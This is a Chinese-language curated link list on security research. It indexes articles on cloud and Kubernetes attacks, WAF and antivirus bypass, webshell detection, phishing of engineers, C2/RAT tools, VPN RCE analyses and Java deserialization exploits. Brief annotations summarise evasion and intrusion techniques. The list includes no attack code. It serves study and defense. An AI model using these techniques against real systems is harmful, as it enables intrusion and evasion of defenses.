[security-hardening](https://github.com/decalage2/awesome-security-hardening) 安全加固大全 ### 安全市场洞察 介绍安全市场概况、趋势、规律。国内外有安全业务厂商 * [XDef安全峰会2021](https://mp.weixin.qq.com/s/RlEu_qVaj1rIhBuf0vQp8g) ### 云安全 #### 云基础知识 * [虚拟化简介](https://yuvaly0.github.io/2020/06/19/introduction-to-virtualization.html) * [kvm](https://github.com/yifengyou/learn-kvm) yifengyou师傅 kvm笔记 #### 云原生安全 * [Google:BeyondProd模型](https://cloud.google.com/security/beyondprod?hl=zh-cn) * [美团云原生之容器安全实践](https://tech.meituan.com/2020/03/12/cloud-native-security.html) * [云原生入侵检测趋势观察](https://xz.aliyun.com/t/7841) * [云原生带来的云安全机遇](https://www.freebuf.com/articles/network/242950.html) 云原生安全市场概况(非技术) * [阿里云安全白皮书](https://github.com/tom0li/collection-document/blob/master/%E9%98%BF%E9%87%8C%E4%BA%91%E5%AE%89%E5%85%A8%E7%99%BD%E7%9A%AE%E4%B9%A6.pdf) #### 云上攻防 * [Awesome-serverless](https://github.com/puresec/awesome-serverless-security/) * [云原生渗透](https://mp.weixin.qq.com/s/Aq8RrH34PTkmF8lKzdY38g) neargle师傅的关于云原生渗透记录,介绍云原生渗透可能碰到的服务及对应的测试思路,目前是国内公开的介绍渗透云原生概论最全的 * [Red Teaming for Cloud](https://mp.weixin.qq.com/s/lUHd6lmFl3m9BMdSC2wwcw) 清晰的阐述什么是red team, 部分典型cloud pentest路径 * [tom0li: docker逃逸小结](https://tom0li.github.io/Docker%E9%80%83%E9%80%B8%E5%B0%8F%E7%BB%93%E7%AC%AC%E4%B8%80%E7%89%88/) 以攻击角度介绍docker逃逸3类方法,介绍一些逃逸实际场景以及针对工程师攻击方法 * [Kubernetes security](https://github.com/kabachook/k8s-security) This repo is a collection of kubernetes security stuff and research. * [serverless functions攻防初探](https://www.cdxy.me/?p=836) 介绍serverless functions攻击路径和防御检测手法 * [RDS数据库攻防](https://xz.aliyun.com/t/8451) 通过信息泄漏的非子ACCESSKEY,配置后可外网连接RDS * [容器与云的碰撞——一次对 MinIO 的测试](https://mp.weixin.qq.com/s/X04IhY9Oau-kDOVbok8wEw) 主要是MinIO对象存储的SSRF漏洞,POST SSRF 307跳转构造利用 * [Kubernetes中使用Helm2的安全风险](http://rui0.cn/archives/1573) 阐述针对Helm2获取secrets具体操作 * [K8s 6443批量入侵调查](https://www.cdxy.me/?p=833) 鉴权配置不当,允许匿名用户以特权请求k8s api,请求pod创建docker,在docker执行创建特权docker并执行恶意命令,删除创建pod * [K8s渗透测试之kube-apiserver利用](https://www.cdxy.me/?p=839) 介绍了经典攻击路径,获取的pod中寻找高权限service acount * [K8s渗透测试etcd的利用](https://www.cdxy.me/?p=827) 介绍未授权etcd和攻击者有cert时渗透命令,读取service account token命令、接管集群命令 * [K8s数据安全之Secrets防护方案](https://www.cdxy.me/?p=832) * [Fantastic Conditional Access Policies and how to bypass them](https://dirkjanm.io/assets/raw/fantastic_policies_cloud_roundup.pdf) Dirk-jan师傅的Azure议题 * [I’m in your cloud: A year of hacking Azure AD](https://dirkjanm.io/assets/raw/Im%20in%20your%20cloud%20bluehat-v1.0.pdf) Dirk-jan师傅的Azure议题 * [Istio访问授权再曝高危漏洞CVE-2020-8595](https://mp.weixin.qq.com/s?__biz=MzIyODYzNTU2OA==&mid=2247487481&idx=1&sn=02a38db691331634fe41a413beb58694&chksm=e84fa926df382030ac57be9c1ee9cb8836ec37fc79e3a2cef68acb6945a51f0ed94882e39611) Istio 完全匹配模式exact匹配不当未授权访问 #### VM ##### vCenter * [CVE-2021-21972 vCenter 6.5-7.0 RCE 漏洞分析](http://noahblog.360.cn/vcenter-6-5-7-0-rce-lou-dong-fen-xi/) * [VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识 ](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ) 介绍为什么不能在burp修改数据包来上传文件 ##### SLP * [CVE-2020-3992 & CVE-2021-21974: Pre-Auth Remote Code Execution in VMware ESXi ](https://www.zerodayinitiative.com/blog/2021/3/1/cve-2020-3992-amp-cve-2021-21974-pre-auth-remote-code-execution-in-vmware-esxi) 介绍两个cve,VM官方在openSLP基础上维护的SLP有UAF漏洞且可绕过补丁 ### AI安全 * [AI-for-Security-Learning](https://github.com/404notf0und/AI-for-Security-Learning) AI的力量 - by 404notf0und * [0xMJ:AI-Security-Learning](https://github.com/0xMJ/AI-Security-Learning#webshell%E6%A3%80%E6%B5%8B) * [Adversarial ML Threat Matrix](https://github.com/mitre/advmlthreatmatrix) 针对Machine Learning系统的对抗 * [AI安全的威胁风险矩阵](https://ai.tencent.com/ailab/media/AI%E5%AE%89%E5%85%A8%E7%9A%84%E5%A8%81%E8%83%81%E9%A3%8E%E9%99%A9%E7%9F%A9%E9%98%B5.pdf) * [基于机器学习的Web管理后台识别方法探索](https://security.tencent.com/index.php/blog/msg/176) 介绍腾讯内部流量系统后台识别模块设计概况 ### 新安全方案 #### 构建下一代安全 * [弹性安全网络 - 构建下一代安全的互联网](https://mp.weixin.qq.com/s/epFSC88J7LF3BGwQdoZ-Rg) #### 零信任 * [张欧:数字银行可信网络实践](https://mp.weixin.qq.com/s/VRG9LEbGTxhpMmCUTUSA8w) 零信任理念 * [零信任下代理工具](https://github.com/mandatoryprogrammer/CursedChrome/blob/master/README.md) 把chrome作为代理,可以通过chrome访问受害者可以访问web服务 #### DevSecOps * [DevSecOps理念及思考](https://mp.weixin.qq.com/s/_jBmFdtyXY5D_YrrTUP1iQ) 腾讯安全应急响应中心 * [Awesome-DevSecOps](https://github.com/devsecops/awesome-devsecops) ### 威胁检测 * [安全智能应用的一些迷思](https://zhuanlan.zhihu.com/p/88042567) #### RASP * [浅谈RASP](https://lucifaer.com/2019/09/25/%E6%B5%85%E8%B0%88RASP/) * [以OpenRASP为基础-展开来港港RASP的类加载](https://xz.aliyun.com/t/8148) #### HIDS * [分布式HIDS集群架构设计](https://www.cnxct.com/distributed-hids-cluster-architecture-design/) 美团技术团队 #### WAF ##### WAF建设指南 * [WAF建设运营及AI应用实践](https://mp.weixin.qq.com/s?__biz=MjM5NzE1NjA0MQ==&mid=2651199346&idx=1&sn=99f470d46554149beebb8f89fbcb1578&chksm=bd2cf2d48a5b7bc2b3aecb501855cc2efedc60f6f01026543ac2df5fa138ab2bf424fc5ab2b0&scene=21#wechat_redirect) ##### BypassWAF * [门神WAF众测总结](https://mp.weixin.qq.com/s/w5TwFl4Ac1jCTX0A1H_VbQ) * [个人总结的waf绕过注入思路(附带6种常见waf的绕过方法)](https://www.t00ls.net/viewthread.php?tid=43687&extra=&page=1) * [老司机带你过常规WAF](https://www.secpulse.com/archives/69983.html) * [SQL注入ByPass的一些小技巧](https://mp.weixin.qq.com/s/fSBZPkO0-HNYfLgmYWJKCg) * [在HTTP协议层面绕过WAF](https://www.freebuf.com/news/193659.html) * [利用分块传输吊打所有WAF](https://www.anquanke.com/post/id/169738) * [WAF绕过的捷径与方法](https://www.qiaoyue.net/2019/WAF%E7%BB%95%E8%BF%87%E7%9A%84%E6%8D%B7%E5%BE%84%E4%B8%8E%E6%96%B9%E6%B3%95/) * [对过WAF的一些认知](http://static.anquanke.com/download/b/security-geek-2019-q2/article-18.html) * [WAF Bypass之webshell上传jsp与tomcat](https://www.anquanke.com/post/id/210630#) * [各种姿势jsp webshell](https://xz.aliyun.com/t/7798) #### Webshell检测 * [查杀Java web filter型内存马](http://gv7.me/articles/2020/kill-java-web-filter-memshell/) * [Filter/Servlet型内存马的扫描抓捕与查杀](https://gv7.me/articles/2020/filter-servlet-type-memshell-scan-capture-and-kill/) * [杂谈Java内存Webshell的攻与防](https://mp.weixin.qq.com/s/DRbGeVOcJ8m9xo7Gin45kQ) * [JSP Webshell那些事 -- 攻击篇](https://mp.weixin.qq.com/s/YhiOHWnqXVqvLNH7XSxC9w) * [Webshell攻与防PHP](https://github.com/qiyeboy/kill_webshell_detect/blob/master/%E7%9F%A5%E8%AF%86%E6%98%9F%E7%90%83-webshell%E6%94%BB%E4%B8%8E%E9%98%B2.pdf) * [污点传递理论在Webshell检测中的应用 - PHP篇](https://mp.weixin.qq.com/s/MFmSliCQaaVEQ0E66vN5Xg) * [新开始:webshell的检测](https://iami.xyz/New-Begin-For-Nothing/) * [利用 intercetor 注入 spring 内存 webshell](https://github.com/LandGrey/webshell-detect-bypass/blob/master/docs/inject-interceptor-hide-webshell/inject-interceptor-hide-webshell.md) 文章是攻击利用角度 #### 反弹Shell检测 * [反弹Shell原理及检测技术研究](https://www.cnblogs.com/LittleHann/p/12038070.html) -by LittleHann * [反弹Shell剖析](https://cloud.tencent.com/developer/article/1645464) * [详解反弹shell多维检测技术](https://www.freebuf.com/articles/network/263684.html) #### EDR * [Lets-create-an-edr-and-bypass](https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/) * [openedr](https://github.com/ComodoSecurity/openedr) 开源产品edr #### AV * [exploiting-almost-every-antivirus-software](https://www.rack911labs.com/research/exploiting-almost-every-antivirus-software/) 反制av,使用链接方式借av高权限达到任意文件删除 * [Bypassing Windows Defender Runtime Scanning](https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/) 枚举测试调用哪些api会触发Defender检测,发现创建CreateProcess和CreateRemoteThread时触发Defender,提出三种解决方案,重写api调用、添加修改指令动态解密加载、使Defender不扫描该区域,作者针对Defender扫描机制(虚拟内存比较大,只扫描MEM_PRIVATE或RWX页权限),当可疑的API被调用时动态设置PAGE_NOACCESS内存权限Defender不会对其安全扫描 * [Engineering antivirus evasion](https://blog.scrt.ch/2020/06/19/engineering-antivirus-evasion/) * [Bypass Windows DefenderAttack Surface Reduction](https://data.hackinn.com/ppt/OffensiveCon2019/Bypass%20Windows%20Exploit%20Guard%20ASR.pdf) * [Defender 扫描文件名问题](http://2016.eicar.org/85-0-Download.html) * [herpaderping](https://github.com/jxy-s/herpaderping) 一种新型 bypass defender * [实现一款 shellcodeLoader](https://paper.seebug.org/1413/) 介绍一些shellcode执行方法,bypass sandbox方法 * [Malware_development_part](https://0xpat.github.io/Malware_development_part_5/) 恶意软件系列教程 * [杀软检测及其Hook点list](https://github.com/D3VI5H4/Antivirus-Artifacts/blob/main/ANTIVURUS_ARTIFACTS.pdf) #### 横向移动检测-蜜罐思路 * [Honeypots](https://github.com/paralax/awesome-honeypots) - Honeypots, tools, components, and more. * [Hunting for Skeleton Key Implants](https://riccardoancarani.github.io/2020-08-08-hunting-for-skeleton-keys/) 检测Skeleton Key 持久化 * [创建蜜罐账户检测Kerberoast](https://www.pentestpartners.com/security-blog/honeyroasting-how-to-detect-kerberoast-breaches-with-honeypots/) #### 恶意流量检测 * [DataCon2020题解:通过蜜罐与DNS流量追踪Botnet](https://www.cdxy.me/?p=829) * [DNS Tunnel隧道隐蔽通信实验 && 尝试复现特征向量化思维方式检测](https://www.cnblogs.com/LittleHann/p/8656621.html#_label0) * [maltrail](https://github.com/stamparm/maltrail#introduction) 开源流量检测产品 * [cobalt-strike-default-modules-via-named-pipe检测](https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/) 检测CS上线后执行默认模块的内存pipe * [用DNS数据进行威胁发现](https://mp.weixin.qq.com/s/6CtRd7o4IjreLaU-hFt9vQ) 介绍360DNSMON 使用DNS监控发现skidmap后门,一些分析手法 * [DNSMon: 用DNS数据进行威胁发现](https://blog.netlab.360.com/use-dns-data-produce-threat-intelligence-2/) 通过DNSMON监控到事件,关联分析事件 * [evading-sysmon-dns-monitoring](https://blog.xpnsec.com/evading-sysmon-dns-monitoring/) * [use-dns-data-produce-threat-intelligence](https://blog.netlab.360.com/use-dns-data-produce-threat-intelligence/) #### IDS * [我们来谈一谈IDS签名](https://www.anquanke.com/post/id/102948#h2-0) * [不按顺序来的 TCP 包](https://strcpy.me/index.php/archives/789/) * [网络层绕过 IDS/IPS 的一些探索](https://paper.seebug.org/1173/) #### 文本检测 * [机器学习在二进制代码相似性分析中的应用](https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458303210&idx=1&sn=345f8cec156ada8fa9bf6a6d6de83906&chksm=b1818a6086f60376e766baf472171d8e2c780b2913568b46b683e3112fcc5f86c9bf4c19e38b&mpshare=1&scene=1&srcid=&sharer_sharetime=1580984631757&sharer_shareid=5dc01f49f38fd64ff3e64844bc7d2ea7&exportkey=A0qHBeUryuXO6zhGWt5OJNw%3D&pass_ticket=gjTFXl4hPMTBWzlKpWZWqK8HivXQ8q7ChNndmw4I8JrdAK0jWWFvKIq7OMnO3BhL#rd) ### 安全运营 * [如何评价安全工作的好坏](https://zhuanlan.zhihu.com/p/226493047) 腾讯'职业欠钱'的向上管理的一些分享 ### 数据安全 * [互联网企业数据安全体系建设](https://tech.meituan.com/2018/05/24/data-security-system-construction.html) * [浅谈数据安全](https://iami.xyz/Talk-about-data-security/) #### 网络测绘 * [简单聊聊网络空间测绘纵横之道](https://www.anquanke.com/post/id/226007) * [让网络空间测绘技术不再那么飘忽不定](https://mp.weixin.qq.com/s/lr39F9kNOfHlMimgymzVwg) by 赵武 网络测绘关注点 * [记录一些网络空间测绘/搜索引擎相关的资料](https://github.com/EXHades/CyberSpaceSearchEngine-Research) ### 通信安全 #### 端对端通信(初版) * [史上最全的zoom漏洞和修复方案介绍](https://mp.weixin.qq.com/s/a7mN0lTeXxA3YmZZxIGNRg) * [对安全即时通讯软件的流量分析攻击](https://www.anquanke.com/post/id/208678#) * [Shadowsocks基于二次混淆加密传输的数据保密性原理分析](https://www.secrss.com/articles/18469) #### SNI * [ESNI](https://www.cloudflare.com/zh-cn/learning/ssl/what-is-encrypted-sni/) what-is-encrypted-sni * [encrypted-client-hello-the-future-of-esni-in-firefox](https://blog.mozilla.org/security/2021/01/07/encrypted-client-hello-the-future-of-esni-in-firefox/) * [encrypted-client-hello](https://blog.cloudflare.com/encrypted-client-hello/) ### 个人安全 * [Tor-0day-Finding-IP-Addresses](https://www.hackerfactor.com/blog/index.php?/archives/896-Tor-0day-Finding-IP-Addresses.html) * [lcamtuf:灾难计划](https://lcamtuf.coredump.cx/prep/) * [tom0li:个人隐私保护](https://tom0li.github.io/%E4%B8%AA%E4%BA%BA%E9%9A%90%E7%A7%81%E4%BF%9D%E6%8A%A4/) 普通人隐私保护思路 * [保护隐私](https://github.com/No-Github/Digital-Privacy) 关于数字隐私搜集方法list * [Supercookie浏览器访问指纹识别](https://supercookie.me/workwise) Supercookie uses favicons to assign a unique identifier to website visitors. 使用多个访问url区别用户 ### APT研究 前期列出的大部分是攻击的内容,包含apt跟踪报告等。 #### 高级威胁-list * [Red-Team-Infrastructure-Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki) * [分析APT报告集合](https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections) 强推 * [论高级威胁的本质和攻击力量化研究](http://www.vxjump.net/files/aptr/aptr.txt) * [OffensiveCon会议](https://www.offensivecon.org/) 不再一一展示 * [ATT&CK](https://attack.mitre.org/matrices/enterprise/) * [Red Team从0到1的实践与思考](https://mp.weixin.qq.com/s/cyxC4Of4Ic9c_vujQayTLg) 介绍Red Team是什么,适合团队内部red建设 * [MITRE | ATT&CK 中文站](https://huntingday.github.io) 知识导图,已不再更新 * [fireeye 威胁研究](https://www.fireeye.com/blog/threat-research.html) 知名威胁分析公司 * [red-team-and-the-next](https://devco.re/blog/2019/10/24/evolution-of-DEVCORE-red-team-and-the-next/) -by DEVCORE redrain及其团队的Anti Threat文章 * [Noah blog](http://noahblog.360.cn/) Anti Threat and Threat Actors through Noah Lab Analysts * [烽火实验室 blog](https://blogs.360.cn/) * [APT 分析及 TTPs 提取](https://paper.seebug.org/1132/) * [关于ATT&CK/APT/归因的讨论](https://weibo.com/ttarticle/p/show?id=2309404450471736639616) * [Legends Always Die -- FireEye Summit中英雄联盟供应链攻击简述](https://card.weibo.com/article/m/show/id/2309404426957856047151) 对一起供应链攻击溯源,基础信息比如域名/ip/email,联系历史apt活动 * [XShellGhost事件技术回顾报告](https://cert.360.cn/static/files/XShellGhost%E4%BA%8B%E4%BB%B6%E6%8A%80%E6%9C%AF%E5%9B%9E%E9%A1%BE%E6%8A%A5%E5%91%8A.pdf) * [Kingslayer A supply chain attack](http://www.hackdog.me/article/Kingslayer-A_supply_chain_attack--Part_1.html) Solarwinds供应链分析 * [从Solarwinds供应链攻击(金链熊)看APT行动中的隐蔽作战](https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q) 代表qianxin分析Solarwinds攻击行为 * [Solarwinds分析](https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf) * [Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor](https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html) * [SUNBURST分析其他细节](https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html) #### 威胁情报 * [对朝鲜指控书](https://www.justice.gov/opa/press-release/file/1092091/download) 花费十年时间的归类过程 * [浅谈网络攻击的“归因”](https://www.secrss.com/articles/14864) 介绍一些APT归类的指标、方法(参考Cyber Attribution文档) 以及一些归类文档 * [什么是威胁情报](https://www.secrss.com/articles/16577) 介绍什么是威胁情报定义、分类、有哪些指标,通过一些案例介绍溯源归类过程 #### 钓鱼 * [SMTP用户枚举原理简介及相关工具](http://www.freebuf.com/articles/web/182746.html) - 用于获取用户字典 * [鱼叉攻击](https://payloads.online/archivers/2020-02-05/1) * [论如何反击用AWVS的黑客](http://www.freebuf.com/news/136476.html) * [从MySQL出发的反击之路](https://xz.aliyun.com/t/3277) * [Mysql Client 任意文件读取攻击链拓展](https://paper.seebug.org/1112/) * [恶意MySQL Server读取MySQL Client端文件](http://scz.617.cn/network/202001101612.txt) * [https://github.com/BloodHoundAD/BloodHound/issues/267](https://github.com/BloodHoundAD/BloodHound/issues/267) -xss * [Ghidra从XXE到RCE](https://xlab.tencent.com/cn/2019/03/18/ghidra-from-xxe-to-rce/) 针对工程师 * [来自微信外挂的安全风险](https://xlab.tencent.com/cn/2018/10/23/weixin-cheater-risks/) 针对个人 * [nodejs仓库钓鱼](https://www.cnblogs.com/index-html/p/npm_package_phishing.html) 针对工程师 * [制作Visual Stuio Code的恶意插件](https://d0n9.github.io/2018/01/17/vscode%20extension%20%E9%92%93%E9%B1%BC/#) 针对工程师 * [VS CODE钓鱼](https://blog.doyensec.com/2020/03/16/vscode_codeexec.html) 针对工程师 * [Python package 钓鱼](https://paper.seebug.org/326/) 针对工程师 * [docker客户端钓鱼](https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence.pdf) 针对工程师 * [利用恶意页面攻击本地Xdebug](https://xlab.tencent.com/cn/2018/03/) 针对工程师 * [华为HG532路由器钓鱼RCE](https://xlab.tencent.com/cn/2018/01/05/a-new-way-to-exploit-cve-2017-17215/) 针对个人 * [内网钓鱼]() ``` RMI反序列化 WIN远程连接漏洞CVE-2019-1333 Mysql读文件&反序列化 Dubbo反序列化 IDE反序列化 恶意vpn 恶意控件 笔记软件rce 社交软件rce NodeJS库rce Python package 钓鱼 VSCODE EXTENSION 钓鱼 VS Studio钓鱼 Twitter钓鱼 红包插件钓鱼防撤回插件 解压rce 破解软件钓鱼 docker客户端钓鱼 docker镜像钓鱼 Xdebug Ghidra钓鱼 bloodhound钓鱼 AWVS钓鱼 蚁剑 浏览器插件 云盘污染 ``` * [..etc]() 邮件伪造 * [一封伪造邮件引发的“探索”(涉及钓鱼邮件、SPF和DKIM等)](http://www.freebuf.com/articles/web/138764.html) * [SPF 记录:原理、语法及配置方法简介](https://www.renfei.org/blog/introduction-to-spf.html) * [邮件伪造技术与检测](https://www.secpulse.com/archives/78738.html) * [伪造电子邮件以及制造电子邮件炸弹的攻防探讨](https://www.freebuf.com/sectool/184555.html) * [绕过DKIM验证,伪造钓鱼邮件](http://www.4hou.com/web/7857.html) * [Best Practices on Email Protection: SPF, DKIM and DMARC](https://wiki.zimbra.com/wiki/Best_Practices_on_Email_Protection:_SPF,_DKIM_and_DMARC) * [Cobalt Strike Spear Phish](https://evi1cg.me/archives/spear_phish.html) * [Gsuite SMTP inject](https://www.ehpus.com/post/smtp-injection-in-gsuite) #### C2-RAT 目前只是简单列一下 * [Koadic C3 COM Command & Control - JScript RAT](https://github.com/zerosum0x0/koadic) * [QuasarRAT](https://github.com/quasar/QuasarRAT) * [CS]() ## 预警&研究 * [Top 10 Web Hacking Techniques of 2017](https://portswigger.net/blog/top-10-web-hacking-techniques-of-2017) - 一个nb的网站 * [Top-10-web-hacking-techniques-of-2018](https://portswigger.net/research/top-10-web-hacking-techniques-of-2018) * [安全PPT大全](http://www.vipread.com/) * [us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA](https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf) -Orange pwn vpn * [bypass沙箱](https://yuange1975.blogspot.com/2019/08/bypass.html) -yuange * [编译原理在安全领域的应用](https://mp.weixin.qq.com/s/6SqdcbyABfBxSaNfDlFKog) * [软件无线电和开源基站在漏洞挖掘中的应用 PART 4:基带安全的一些探索和学习资源整合](https://cn0xroot.com/2020/11/21/part-4/) by 雪碧 0xroot * [recovering-passwords-from-pixelized-screenshots-sipke-mellema](https://www.linkedin.com/pulse/recovering-passwords-from-pixelized-screenshots-sipke-mellema) 去除文本马赛克,测试限制条件过多,需要同一截图软件、xy坐标、字体、颜色 ### ImageMagick * [ImageMagick漏洞凑热闹手札](https://d0n9.github.io/2018/08/22/ImageMagick%20%E6%BC%8F%E6%B4%9E%E5%87%91%E7%83%AD%E9%97%B9%E6%89%8B%E6%9C%AD/#) * [如何使用Fuzzing挖掘ImageMagick的漏洞](https://github.com/lcatro/Fuzzing-ImageMagick/blob/master/%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8Fuzzing%E6%8C%96%E6%8E%98ImageMagick%E7%9A%84%E6%BC%8F%E6%B4%9E.md) * [ImageMagick-CVE-2016-3714 命令执行分析](http://www.zerokeeper.com/vul-analysis/ImageMagick-CVE-2016-3714.html) * [Imagemagick 邂逅 getimagesize 的那点事儿](https://paper.seebug.org/969/) ### Exchange * [Microsoft Exchange漏洞记录(撸向域控) - CVE-2018-8581](https://www.cnblogs.com/iamstudy/articles/Microsoft_Exchange_CVE-2018-8581.html) * [利用 Exchange SSRF 漏洞和 NTLM 中继沦陷域控](https://xax007.github.io/2019-01-26-pwn-domain-admin-via-exchange-ssrf/) * [Microsoft Exchange漏洞分析 CVE-2018-8581](http://www.cnblogs.com/iamstudy/articles/Microsoft_Exchange_CVE-2018-8581_2.html) * [Microsoft Exchange 任意用户伪造漏洞(CVE-2018-8581)分析](https://paper.seebug.org/804/) * [.Net 反序列化之 ViewState 利用](https://paper.seebug.org/1386/) * [proxylogon](https://www.praetorian.com/blog/reproducing-proxylogon-exploit/) * [生成ViewState的程序实现](https://mp.weixin.qq.com/s/n5UNEc_1-nqMROQg31W_WA) ### Privilege-Escalation * [Ubuntu-gdm3-accountsservice-LPE](https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE) ### VPN #### Sangfor * [深信服后台RCE](https://www.cnblogs.com/potatsoSec/p/12326356.html) * [深信服前台RCE由于没公开不附链接]() #### Pulse * [Pulse-secure-read-passwd-to-rce](https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html) -by orange * [Pulse Connect Secure RCE CVE-2020-8218](https://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/) * [Pulse Connect Secure – RCE via Template Injection (CVE-2020-8243)](https://research.nccgroup.com/2020/10/06/technical-advisory-pulse-connect-secure-rce-via-template-injection-cve-2020-8243/) #### Palo * [Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!](https://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html) #### Fortigate * [Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN](https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html) #### Citrix Gateway/ADC * [Citrix Gateway/ADC 远程代码执行漏洞分析](https://blog.riskivy.com/citrix-gateway-adc-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/) ### Tomcat * [Apache Tomcat 8.x vulnerabilities](https://tomcat.apache.org/security-8.html) ### FUZZING * [Awesome-Fuzzing](https://github.com/secfigo/Awesome-Fuzzing) * [Fuzzing平台建设的研究与设计](http://riusksk.me/2020/01/21/Fuzzing%E5%B9%B3%E5%8F%B0%E5%BB%BA%E8%AE%BE%E7%9A%84%E7%A0%94%E7%A9%B6%E4%B8%8E%E8%AE%BE%E8%AE%A1-paper/) by 泉哥 * [探索先进自动化漏洞挖掘技术中的不足](https://mp.weixin.qq.com/s/1q_YCJoyCREtgU3X2_0uqQ) 覆盖度问题 * [Fuzzing战争: 从刀剑弓斧到星球大战](https://mp.weixin.qq.com/s?__biz=MzI3ODI4NDM2MA==&mid=2247483742&idx=1&sn=55414da793fdf882cd6a0e396857678a&scene=21#wechat_redirect) Flanker 讲解Fuzzing历史趋势 * [Fuzzing战争系列之二:不畏浮云遮望眼](https://mp.weixin.qq.com/s/G26MJOH4VPene1Sd_zjEQw) Coverage-Guided Fuzzing 解决闭源思路 Static or Dynamic & Dynamic Tracing * []() ## 代码审计-JAVA * [javasec.org](https://javasec.org/) -by 园长 * [JAVA代码审计的一些Tips(附脚本)](https://xz.aliyun.com/t/1633) * [敏信Java代码审计-层层推进](https://xz.aliyun.com/t/2074) * [Java漏洞代码](https://github.com/JoyChou93/java-sec-code) * [代码审计知识星球精选](https://tricking.io) ### 反序列化-其他 * [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#java-native-serialization-binary) * [tomcat不出网回显](https://xz.aliyun.com/t/7535) * [Java 反序列化回显的多种姿势](https://xz.aliyun.com/t/7740) * [半自动化挖掘request实现多种中间件回显](http://gv7.me/articles/2020/semi-automatic-mining-request-implements-multiple-middleware-echo/) * [Java 后反序列化漏洞利用思路](http://rui0.cn/archives/1338) * [URL ECCENTRICITIES IN JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/) java url类请求导致的ssrf lfi 泄漏java版本 * [HSQLDB 安全测试指南](https://xz.aliyun.com/t/9162#) HSQLDB(HyperSQL DataBase) 是一个完全由Java编写的小型嵌入式数据库 ### RMI * [Java RMI入门](http://scz.617.cn/network/202003121717.txt) * [attacking-java-rmi-services-after-jep-290](https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/) * [针对RMI服务的九重攻击 - 上](https://xz.aliyun.com/t/7930) * [针对RMI服务的九重攻击 - 下](https://xz.aliyun.com/t/7932) * [一次攻击内网rmi服务的深思](https://forum.90sec.com/t/topic/388/1) 解决REJECTED 报错 ### Shiro * [Shiro RememberMe 漏洞检测的探索之路](https://blog.xray.cool/post/how-to-find-shiro-rememberme-deserialization-vulnerability/) 从使用空SimplePrincipalCollection检测key到Tomcat通用回显到检测过程会碰到的种种困难 * [从一次开发漏洞看shiro的正确使用](https://xz.aliyun.com/t/5287) * [Shiro RememberMe 1.2.4 反序列化导致的命令执行漏洞](https://paper.seebug.org/shiro-rememberme-1-2-4/) * [强网杯“彩蛋”——Shiro 1.2.4(SHIRO-550)漏洞之发散性思考](https://blog.zsxsoft.com/post/35) * [Shiro 721 Padding Oracle攻击漏洞分析](https://www.anquanke.com/post/id/193165#h2-14) * [Shiro权限绕过漏洞分析](https://www.freebuf.com/vuls/231909.html) * [Java代码执行漏洞中类动态加载的应用](https://mp.weixin.qq.com/s?__biz=MzAwNzk0NTkxNw==&mid=2247484622&idx=1&sn=8ec625711dcf87f0b6abe67483f0534d) 不出网注册filter reGeorg代理 ### Fastjson * [fastjson反序列化利用](https://lazydog.me/post/fastjson-JdbcRowSetImpl-rce-exploit.html) * [FastJson =< 1.2.47 反序列化漏洞浅析](https://bithack.io/forum/393) * [FASTJSON反序列化之基于JNDI利用方式](https://manning23.github.io/2018/03/01/Fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96jndi%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B%E5%88%86%E6%9E%90/) * [Fastjson反序列化漏洞调试分析](https://www.angelwhu.com/blog/?p=552) * [FastJson 反序列化学习](http://www.lmxspace.com/2019/06/29/FastJson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0/) * [浅谈Fastjson RCE漏洞的绕过史](https://www.freebuf.com/vuls/208339.html) * [通过dnslog探测fastjson的几种方法](http://gv7.me/articles/2020/several-ways-to-detect-fastjson-through-dnslog/) * [fastjson 1.2.68 autotype bypass gadget 的一种挖掘思路](https://hackcrowd.com/forum_detail/828) ### Dubbo * [Dubbo2.7.7反序列化漏洞绕过分析](https://mp.weixin.qq.com/s/jKM-Z2BTFfk_Ro1rJAxg5w) 云鼎实验室 * [Dubbo 2.7.8多个远程代码执行漏洞](https://xz.aliyun.com/t/8917) * [如何绕过高版本JDK的限制进行JNDI注入利用](https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html) 